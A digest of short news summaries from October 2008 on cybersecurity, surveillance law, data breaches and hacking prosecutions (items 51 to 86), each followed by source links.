51. EFF Challenges Constitutionality of New FISA Law (October 17, 18 & 20, 2008) The Electronic Frontier Foundation (EFF) has filed court documents challenging the legality of the FISA Amendments Act. The law grants retroactive immunity to telecommunications companies that have helped the National Security Agency (NSA) with wiretapping US citizens' phone calls and email. The EFF maintains that the new FISA law violates citizens' rights to due process of law as well as the federal government's separation of powers. The EFF maintains that as most of the eavesdropping under the new FISA law takes place without a warrant or a subpoena and the authorization for the eavesdropping comes from the president rather than the courts, the new FISA law violates citizens‘ rights to due process of law as well as the federal government's separation of powers. http://www.eweek.com/index2.php?option=content&task=view&id=50041&pop=1&hide_ ads=1&page=0&hide_js=1 http://www.vnunet.com/vnunet/news/2228565/eff-takes-shot-immunity-law http://www.informationweek.com/news/telecom/policy/showArticle.jhtml?articleID=21120 1760

52. Guilty Plea in Scientology Web Attack (October 17 & 18, 2008) An 18-year-old New Jersey man has admitted to having a role in a distributed denial-of- service (DDoS) attack against a Church of Scientology website in January. The attack reportedly cased US $70,000 worth of damage. Dmitriy Guzner has pleaded guilty to one count of unauthorized impairment of a protected computer. Guzner faces up to 10 years in prison and has agreed to pay US $37,500 in restitution. http://www.theregister.co.uk/2008/10/17/scientology_ddos_guilty_plea/ http://www.vnunet.com/vnunet/news/2228567/teenage-hacker-charged-ddos

53. Audit Finds Fault With Physical Security at the Canada Revenue Agency (October 20, 2008) The tax information of Canadian citizens is at risk of exposure due to lax physical security. According to the June audit of the Canada Revenue Agency, "certain exterior doors and interior perimeter doors were not adequately secured." In three instances, electronic alarm systems were defective, unarmed or missing. Other security vulnerabilities noted in past audits have not been addressed. Many employees were not aware of security standards at the workplace. The Canada Revenue Agency also reported numerous pieces of equipment lost or stolen last year, including 25 laptops, 17 cell phones, six BlackBerries, five printers, a router and two video surveillance cameras. The audit did not examine the agency's electronic data systems. http://www.edmontonsun.com/News/Canada/2008/10/20/pf-7141301.html

54. DHS Inspector General Report Says Portable Storage Device Security Lacking (October 16, 2008) According to a report from the US Department of Homeland Security (DHS) Inspector General Richard Skinner, DHS has not taken adequate security precautions with portable electronic devices that connect to its unclassified computer systems. The report, "Review of DHS Security Controls for Portable Storage Devices," says that while DHS has developed policies regarding "acceptable use of portable storage devices,... the policies have not been implemented by the components. [There is no] centralized process to procure and distribute portable storage devices to ensure that only authorized devices that meet the technical requirements can connect to its systems." The report recommended that DHS "establish an inventory of authorized devices; implement controls to ensure that only authorized devices can connect to DHS systems: and perform discovery scans, at least annually, to identify unauthorized devices. http://www.fcw.com/online/news/154093-1.html http://www.dhs.gov/xoig/assets/mgmtrpts/OIG_08-95_Sep08.pdf

55. South Korean Prime Minister Warns of Cyber Attacks (October 14 & 15, 2008) South Korean Prime Minister Hang Seung-Soo has warned his cabinet that cyber attacks from China and North Korea have resulted in the thefts of large numbers of state secrets. Prime Minister Han pointed to a lax security environment in which public servants have used sensitive data on personal computers or over the Internet. Government computer systems are now subject to monthly security checks in an effort to thwart further data theft. The majority of the documents stolen relate to foreign policy and national security. http://www.ioltechnology.co.za/article_page.php?iSectionId=2885&iArticleId=4659863 http://english.chosun.com/w21data/html/news/200810/200810150003.html

56. Supreme Court Vacates Order Directing Ohio AG to Update Voter Database (October 17 & 18, 2008) As US states switch from local voting rolls to statewide databases of voters, inaccurate information has called into question some voters‘ eligibility, prompting lawsuits across the country. The problems arise when the information in the database does not mesh exactly with other official records. In Alabama, some voters were incorrectly identified as convicted felons. In Wisconsin, voters' eligibility was questioned due to small discrepancies, such as a missing middle initial or a mistyped birth date. Last week, the US Supreme Court blocked a challenge to 200,000 Ohio voters based on information discrepancies. Also, a judge in Michigan ruled that the names of thousands of voters must be restored to voter rolls in that state after they were taken off because of residency questions. http://www.washingtonpost.com/wp- dyn/content/article/2008/10/17/AR2008101703360_pf.html http://www.washingtonpost.com/wp- dyn/content/article/2008/10/17/AR2008101703205_pf.html http://www.supremecourtus.gov/opinions/08pdf/08A332.pdf

57. Data Breaches at State and Local Level Far Exceed Those at Federal Level (October 20, 2008) According to statistics from the Privacy Rights Clearinghouse, breaches of systems at the local and state level of US government exposed the personally identifiable information of more than 3.8 million American citizens in the first nine months of 2008. The majority of the records compromised arose from a July 2008 breach at the Colorado Department of Motor vehicles that affected 3.4 million people. During those same nine months, the number of records breached at federal agencies is reported to be 23,024. The discrepancy calls attention to the need for standardized data security at the state and local levels of government. http://www.gcn.com/cgi-bin/udt/im.display.printable?client.id=gcn_daily&story.id=47396

58. Georgian Cyber Attacks Traced to Russian Online Forum (October 16 & 17, 2008) An investigation into August's cyber attacks launched against Georgian government websites indicate that they were "coordinated through a Russian online forum," and while "there was no external involvement or direction from State organizations," Russian officials appear not to have stepped in to stop the attacks. The group launching the attacks had a list of known vulnerabilities in the targeted websites along with instructions for exploiting those holes. The attackers apparently used SQL injection attacks to render the targeted sites inaccessible. http://voices.washingtonpost.com/securityfix/2008/10/report_russian_hacker_forums_f.ht ml?nav=rss_blog http://www.scribd.com/doc/6967393/Project-Grey-Goose-Phase-I-Report

59. NIST Request for Information Seeks "Revolutionary Ideas" for Cyber Security (October 14, 2008) The National Institute of Standards and Technology (NIST) has issued a request for Information (RFI) on behalf of the National Coordination Office (NCO) for Networking and Information Technology Research and Development (NITRD) seeking "just a few revolutionary ideas with the potential to reshape the [cyber security] landscape." The RFI marks the kickoff for the National Cyber Leap Year, which aims to develop "game- changing ideas" to make cyberspace safe for the American way of life." The first phase of the project will gather ideas; the second phase involves development of the best of those ideas. Ideas must be submitted by December 15, 2008. The project is part of the Comprehensive National Cybersecurity Initiative (CNCI). http://www.fcw.com/online/news/154063-1.html?type=pf

60. Microsoft Issues Out-of-Cycle Patch (October 22 & 23, 2008) Microsoft has released an out-of-cycle patch for a critical remote code execution vulnerability today, October 23, 20008. The flaw could be exploited to allow a worm to spread without any user interaction. The flaw affects Windows 2000, XP, Server 2003, Server 2008 and Vista. The "privately reported" vulnerability in the Server service "could allow remote code execution if an affected system received a specially crafted RPC [remote procedure call] request.“ http://voices.washingtonpost.com/securityfix/2008/10/microsoft_to_issue_emergency_s_ 1.html?nav=rss_blog http://www.securityfocus.com/brief/844 http://www.theregister.co.uk/2008/10/23/windows_emergency_update/ http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9 117878&source=rss_topic17 http://news.cnet.com/8301-1009_3-10074072-83.html?part=rss&subj=news&tag=2547- 1009_3-0-20 http://www.us-cert.gov/cas/techalerts/TA08-297A.html http://www.microsoft.com/technet/security/Bulletin/MS08-067.mspx

61. Dutch Judge Orders Google to Reveal IP Addresses Associated with Suspect Gmail Account (October 20, 2008) A judge in the Netherlands has ordered Google to turn over IP addresses associated with a Gmail account that was used in a case of alleged industrial espionage. Google had refused to comply with the initial request from the company, iMerge, because "disclosing the user's identity violated rulings on the balance between freedom of expression and a person's right to his reputation." The suspect had been chief technology officer at iMerge. He allegedly installed a backdoor server in the hosting center configured to forward messages from a corporate director's mailbox to the Gmail account in question. http://www.theregister.co.uk/2008/10/20/dutch_court_orders_google_to_reveal_gmail_us er/ http://www.informationweek.com/shared/printableArticle.jhtml?articleID=211201988

62. UPenn Student Sentenced for Role in DDoS Attack (October 22 & 23, 2008) University of Pennsylvania student Ryan Goldstein has been sentenced to three months in prison, three months in a halfway house, three months of home confinement and five years on probation, for his role in a distributed denial-of-service (DDoS) attack that targeted a University of Pennsylvania server. Goldstein was arrested as part of Operation Bot Roast II, an FBI initiative. He will also pay a US $30,000 fine and US $6,100 in restitution. Goldstein could have faced much harsher penalties because child pornography was found on his computer, but he was not charged with those offenses in return for his cooperation with authorities. Goldstein had convinced New Zealand teenager Owen Walker to launch the attack. Walker was charged in New Zealand; he pleaded guilty and was fined, but received no prison time. http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9 117811&source=rss_topic17 http://www.nzherald.co.nz/technology/news/article.cfm?c_id=5&objectid=10539102 http://www.philly.com/inquirer/local/pa/20081022_Penn_student_jailed_90_days_in_hac king_case.html

63. Computer Stolen From Risk Management Firm Hold Fresno, CA City Employee Data (October 22 & 23, 2008) On October 13, 2008, thieves stole more than two dozen computers from the Fresno, California office of KRM Risk Management. One of the computers contains personally identifiable information of more than 5,000 Fresno city employees who had filed worker's comp claims as far back as 1973. KRM was hired by the city to manage its compensation claims. Police are offering a US $5,000 reward for information leading to the arrest of those responsible for the theft. Law enforcement agents are analyzing video from a neighboring business for clues. http://abclocal.go.com/kfsn/story?section=news/local&id=6462368 http://abclocal.go.com/kfsn/story?section=news/local&id=6465115 http://www.cbs47.tv/news/local/story.aspx?content_id=853f41c4-1055-44a8-b78c- 05df4a7c80a

64. Russian Hacker Takes Credit for Attacks on Georgia Parliament (October 23, 2008 Leonid "R0id" Stroikov claims he is responsible for attacks on the Georgia parliament. Reported in the latest edition of Xakep ("Hacker") magazine, Stroikov describes his attack and why he decided to do it. http://blog.wired.com/defense/2008/10/government-and.html

65. Researchers Read Electromagnetic Emanations From Wired Keyboards (October 20 & 22, 2008) Swiss researchers have demonstrated that keystrokes from wired keyboards can be read remotely from distances of up to 20 meters. The keyboards emit electromagnetic waves. The researchers at Security and Cryptography Laboratory at Ecole Polytechnique Federale de Lausanne have described four different methods of eavesdropping on keystrokes on wired keyboards. http://news.cnet.com/8301-1009_3-10072967-83.html?tag=mncol;title http://www.theregister.co.uk/2008/10/20/keyboard_sniffing_attack/

66. NY HS Student Charged with Felonies After Notifying Principal of Security Hole (October 24, 25 & 28, 2008) A 15-year-old Shenendehowa Central School student has been arrested and charged with computer trespass, unlawful possession of personal identification information and identity theft, all of which are felonies. The student allegedly gained access to a school system database while in a computer class at the school. He then allegedly emailed the principal, telling him what he had been able to do. The file was accessible to anyone with a district password, students included. The district superintendent said that while the file may have been accessible, it required some know-how to find and access it. The student has been suspended from school and will face the charges against him in family court in Saratoga County, NY. http://timesunion.com/AspStories/story.asp?storyID=732745 http://www.dailygazette.com/news/2008/oct/25/1025_shendata/ http://www.theregister.co.uk/2008/10/28/student_charged/

67. Final Version of OMB Memo Rolls Back Federal CIOs' Clout (October 24, 2008) The final version of an Office of Management and Budget (OMB) memo describing the responsibilities of federal chief information officers (CIOs) no longer has a clause that stated that CIOs report to agency heads and that "except where otherwise authorized by law, order, or waiver from the director of OMB, no other individual in any organizational component of the agency... has authorities or responsibilities that infringe upon those of the agency CIO." Other changes from earlier drafts of the memo include removing language that gave CIOs the authority to plan, manage and oversee agencies' IT portfolios; instead, those responsibilities were given to agency heads. Some have said that the final draft does not comply with the Clinger- Cohen Act, which establishes the position of CIO at federal agencies and requires that they report to agency heads. The changes appear to be a move to keep power in the hands of political appointees rather than career executives. (The story includes a link to a tool that allows readers to compare the final version of the memo with the most recent draft.) http://www.nextgov.com/nextgov/ng_20081024_5887.php

68. DHS to Take Over Airline Passenger Screening (October 22 & 23, 2008) Starting in January, the responsibility for checking airline travelers‘ names against the passenger watch and no-fly lists will pass from the airlines to the US Department of Homeland Security (DHS). Passengers will be required to provide their full names, birthdates and genders to board commercial aircraft. The additional required information is intended to reduce significantly the number of false positives, or people whose travel is "wrongly" delayed or prevented. The no-fly list has fewer than 2,500 names on it; just 10 percent of those are US citizens. The selectee list, which identifies people who are subject to additional questioning, contains fewer than 16,000 names, and less than half are US citizens. The shift comes with the release of the Secure Flight Final Rule. http://www.washingtonpost.com/wp- dyn/content/article/2008/10/22/AR2008102202646_pf.html http://www.tsa.gov/press/releases/2008/1022.shtm

69. Draft Army Intelligence Paper Voices Concern Over Twitter as Potential Terrorist Tool (October 25 & 27, 2008) According to a draft US Army intelligence paper, voice-altering software, Global Positioning System (GPS) maps and the micro-blogging service Twitter could be used to plan and carry out terrorist attacks. The report notes that twitter was used to spread news of a recent Los Angeles (CA) earthquake more quickly than commercial news outlets and that "Twitter is already used by some members [of social activism, human rights and other groups] to post and/or support extremist ideologies and perspectives.“ http://news.cnet.com/8301-1009_3-10075487-83.html?part=rss&subj=news&tag=2547- 1009_3-0-20 http://www.informationweek.com/news/mobility/messaging/showArticle.jhtml?articleID=2 11600844 http://www.breitbart.com/article.php?id=081025182242.js2g2op8&show_article=1 http://www.fas.org/irp/eprint/mobile.pdf

70. FBI: US Business and Government are Targets of Cyber Theft (October 22, 2008) Assistant Director in charge of the US FBI's Cyber Division Shawn Henry said that US government and businesses face a "significant threat" of cyber attacks from a number of countries around the world. Henry did not name the countries, but suggested that there are about two dozen that have developed cyber attack capabilities with the intent of using those capabilities against the US. The countries are reportedly interested in stealing data from targets in the US. Henry said businesses and government agencies should focus on shoring up their systems' security instead of on the origins of the attacks. http://www.intergovworld.com/article/24e239a7c0a8000600c26acd165c8672/pg0.htm

71. eVoting Machine Study Finds Problems (October 27, 2008) A newly-released report says that the electronic voting machines used in New Jersey and other US states are unreliable and potentially vulnerable to hacking. A New Jersey judge ordered the report as part of a lengthy legal battle over the use of the devices, which are Sequoia AVC Advantage 9.00H direct recording electronic (DRE) touch- screen voting machines. The report says that the machines can be manipulated by installing a replacement chip containing malicious software on the main circuit board. http://wvgazette.com/News/200810180251?page=1&build=cache

72. Yahoo! Fixes Cross-Site Scripting Flaw (October 27, 2008) Yahoo! has repaired a cross-site scripting flaw in the hotjobs.yahoo.com domain that was being exploited to access people's Yahoo! Mail accounts and restricted areas of the website. Attackers hid JavaScript in certain pages to steal users' authentication cookies, which then allowed then to gain control of the users' Yahoo! accounts. Yahoo! fixed the flaw within hours of learning of it. http://www.theregister.co.uk/2008/10/27/yahoo_xss_vuln/

73. Trojan Exploits Just-Patched Windows RPC Flaw (October 24 & 27, 2008) Just one day after Microsoft released an out-of-cycle patch to fix a critical remote procedure call (RPC) flaw in the Server service, a Trojan horse program that exploits the vulnerability has been detected. The malware could potentially be used to allow infected machines to infect other unpatched computers on its network with no user interaction. http://www.theregister.co.uk/2008/10/24/trojan_exploits_wormable_microsoft_flaw/ http://voices.washingtonpost.com/securityfix/2008/10/data- stealing_trojan_exploitin.html?nav=rss_blog http://blogs.securiteam.com/index.php/archives/1150 http://www.heise-online.co.uk/security/Windows-RPC-hole-being-exploited-already-- /news/111795

74. Price of Stolen Data Falling, But Cost to Victims is Still High (October 27, 2008) The value of stolen payment card information is estimated to be one-tenth what it was a decade ago. Part of the reason may be the large scale of data security breaches that have flooded the black market with stolen personal financial information. Some data thieves age their quarry, waiting months to sell it so that the specter of fraud may have eased for the victims. http://www.forbes.com/2008/10/25/credit-card-theft-tech-security- cz_tb1024theft_print.html

75. Appeals Court Upholds Decision, Reversing Case That Allowed Business Method Patents (October 30, 2008) The United States Court of Appeals for the Federal Circuit this week ruled nine to three to uphold a lower court decision that could reverse the landmark State Street Bank vs. Signature Financial Group case. That case, decided in 1998, found that business methods for computer commerce were patentable, and led to successful applications for patents for Amazon.com's "1-Click" checkout and Priceline.com's "name your own price" and various other tools. http://bits.blogs.nytimes.com/2008/10/30/federal-court-kills-patents-on-business- methods/?pagemode=prints http://www.groklaw.net/article.php?story=20081030150903555 http://blogs.wsj.com/law/2008/10/30/court-reverses-position-on-business-methods- patents-in-bilski-case/?mod=googlenews_wsjs http://www.groklaw.net/pdf/07-1130.pdfs

76. Court Rules Running Hashes Constitutes Fourth Amendment Search (October 29, 2008) A US District Court has ruled that running hash values on a computer constitutes a Fourth Amendment search (meaning a warrant would have been needed to allow the evidence to be used in court). The ruling suppresses evidence found by police on Robert Crist's computer. Because Crist had fallen behind on his rent, his landlord hired people to move his belongings to the curb. A friend of the movers picked up his laptop, and when Crist discovered the pile of his property outside, he reported his computer stolen. Crist's friend allegedly found images of child pornography on the machine and called the police, who then ran hashes on the machine to determine if it contained files known to be child pornography. The decision will likely be appealed. http://volokh.com/archives/archive_2008_10_26-2008_11_01.shtml#1225159904 http://arstechnica.com/news.ars/post/20081029-court-rules-hash-analysis-is-a-fourth- amendment-search.html

77. Study Finds Security Policy Adherence Problems (October 28 & 29, 2008) A Cisco-commissioned study found that employees at businesses in 10 countries around the world are often unaware of their companies‘ security polices, or the employees ignore the policies because they hinder productivity. When surveyed about whether their companies had security policies, there was a 20 to 30 percent gap between responses from IT professionals and other employees. When asked why security policies are violated, IT professionals pointed to ignorance, while other employees said it was because the policies made it more difficult for them to do their jobs. The study surveyed more than 2,000 employees and IT professionals at companies in the US, the UK, France, Germany, Italy, Japan, China, India, Australia and Brazil. http://www.eweek.com/c/a/Security/Cisco-Study-Highlights-Common-Failures-of- Enterprise-Security-Policies/ http://www.computerworld.com.au/index.php/id;1866823251;fp;4;fpid;78268965

78. Tenenbaum Indicted in New York (October 29 & 30, 2008) Ehud Tenenbaum has been indicted in New York on charges of access device fraud and conspiracy to commit access device fraud. The indictment alleges that Tenenbaum "did knowingly and with intent to defraud effect transactions with one or more access devices issued to another person or persons." Last month, Tenenbaum and three accomplices were arrested in Canada for allegedly breaking into computer systems to increase limits on prepaid debit and credit cards and using those cards to withdraw US $1.7 million. In 1998, Tenenbaum broke into unclassified computer systems at the Pentagon in what was then called "the most organized and systematic attack to date" on US defense department computers. http://www.theregister.co.uk/2008/10/30/analyzer_hacker_indictment/ http://blog.wired.com/27bstroke6/2008/10/israeli-hacker.html

79. Cyber Saboteur Gets Six Months in Prison (October 28, 2008) A federal judge has sentenced contract systems administrator Priyavrat Patel to six months in prison for deliberately sabotaging three servers at his former employer's business. Patel will also serve three years of supervised release, the first six months of which will be in home confinement, and pay US $120,000 in restitution. Patel was upset over having been fired from his contract position at Connecticut tool manufacturer Pratt- Read; he removed critical boot-up files from the three servers, forcing them to use paper documentation for two weeks while the problem was cleaned up. Patel had accessed the servers from his home in late November 2007. http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9 118362&source=rss_topic17 http://newhaven.fbi.gov/dojpressrel/2008/nh102808b.htm

80. ICANN Tells EstDomains its Registrar Accreditation Will be Revoked (October 29 & 30, 2008) The Internet Corporation for Assigned Names and Numbers (ICANN) says that EstDomains' registrar accreditation will be revoked on November 12. EstDomains is a domain name registrar that is known to register shady domains used in the commission of cybercrime. The reason given for the revocation is that company president Vladimir Tsastsin was convicted in an Estonian court on credit card fraud charges. Many domain names registered by EstDomains have been used in spam, phishing, malware spreading and drug sale schemes. US network provider Intercage also ended its contract with EstDomains when it was faced with termination of service from its upstream providers for similar reasons. Update: The revocation has been temporarily stayed while ICANN hears EstDomains' response to the charges against Tsastsin. http://www.theregister.co.uk/2008/10/29/estdomains_gets_deaccredited/ http://www.vnunet.com/vnunet/news/2229394/estdomains-fighting-life http://www.securityfocus.com/brief/847

81. Group Challenges Texas Law Requiring Computer Repair Technicians to Have Private Investigator Licenses (October 31, 2008) The Texas Private Security Board has once again refused to approve a rule that would exempt computer repair technicians from licensing requirements. Presently, anyone in Texas who performs an action on a computer that is deemed an investigation must have a valid, government-issued private investigator's license. The Board tabled a proposal exempting repair technicians from the requirement earlier this year and did so again last week. The law also punishes consumers who have their computers repaired by unlicensed individuals. The law is Being challenged under the Texas Constitution by the Institute for Justice Texas Chapter. http://www.ij.org/index.php?option=com_content&task=view&id=2438&Itemid=129

82. French Senate Approves Law That Would Cut Off Pirates' Internet Access (October 31, 2008) The French Senate has approved a "graduated response" law that would cut off Internet users who habitually download digital content in violation of copyright law. The law still needs to be approved by the lower house before it can be enacted. First time violators would receive an email warning. If they continue to download illegally, they will receive a letter in the mail, and continued infractions will result in Internet service being cut off for one year. If enacted, the law would be at odds with a European Parliament amendment that prohibits cutting off Internet service for illegal downloading. http://euobserver.com/9/27026

83. Test Finds Recertified Data Storage Tapes Expose Old Information (October 30, 2008) In a test of 100 erased and recertified data storage tapes conducted by storage media maker Imation, researchers were able to read sensitive bank and hospital information, as well as field research and Human Genome Project data. The test "confirms industry guidance that the only way to properly dispose of data is to destroy the media itself." Other companies that sell data storage technology have conducted similar studies that drew similar conclusions, but a company that sells recertified tapes says that "any data that remains on the tape is not usable/readable.“ http://www.darkreading.com/security/storage/showArticle.jhtml?articleID=211800370

84. US Defense Department Takes Cyber Security Seriously (October 30, 2008) Speaking at the National Homeland Defense Foundation's Cyber Threats Symposium, Rear Admiral Jan Hamby says that cyber security has become a priority in the US military ever since the 2005 Titan Rain attacks on military systems. The Defense Department's Joint Task Force Global Network Operations (JTF-GNO) has stepped forward as a model in cyber security best practices, including banning YouTube, MySpace and other such sites from military computers. JTF-GNO has also taken a hard line on patch management on military computer systems. http://mail.google.com/mail/?shva=1#inbox/11d6494cdc0443b4

85. Trojan Responsible for Theft of Half a Million Records of Financial Account Data (October 31, 2008) Researchers have uncovered a trove of financial account data stolen by a Trojan horse program known as Sinowal over the last several years. As many as half a million accounts have been compromised; more than 20 percent were stolen in the last six months alone. Sinowal, which is also known as Torpig and Mebroot, spreads through websites onto unpatched PCs without any user interaction. That the Trojan had been operating for nearly three years has been called "extraordinary." It lies in wait on infected PCs; when a user enters a banking URL, it offers up a phony site to collect the pertinent data and then sends the information back to a drop server. http://www.theregister.co.uk/2008/10/31/sinowal_trojan_heist/ http://www.theregister.co.uk/2008/10/31/torpig_banking_trojan/ http://news.bbc.co.uk/2/hi/technology/7701227.stm http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9 118718&intsrc=hm_list

86. US State Department Warns of Passport Application Data Theft (October 31, 2008) The US State Department has notified 383 people that their personal information supplied when applying for a passport may have been compromised. A man arrested earlier this year was found to have credit cards in nearly 20 different names; several passport applications in his possession matched the names on some of the cards. The information from the applications was allegedly used to open the fraudulent credit card accounts. The suspect told authorities at the time that he had two accomplices, one at the State Department and the other at the US Postal Service. http://www.msnbc.msn.com/id/27475651/ http://www.washingtonpost.com/wp- dyn/content/article/2008/10/30/AR2008103004716_pf.html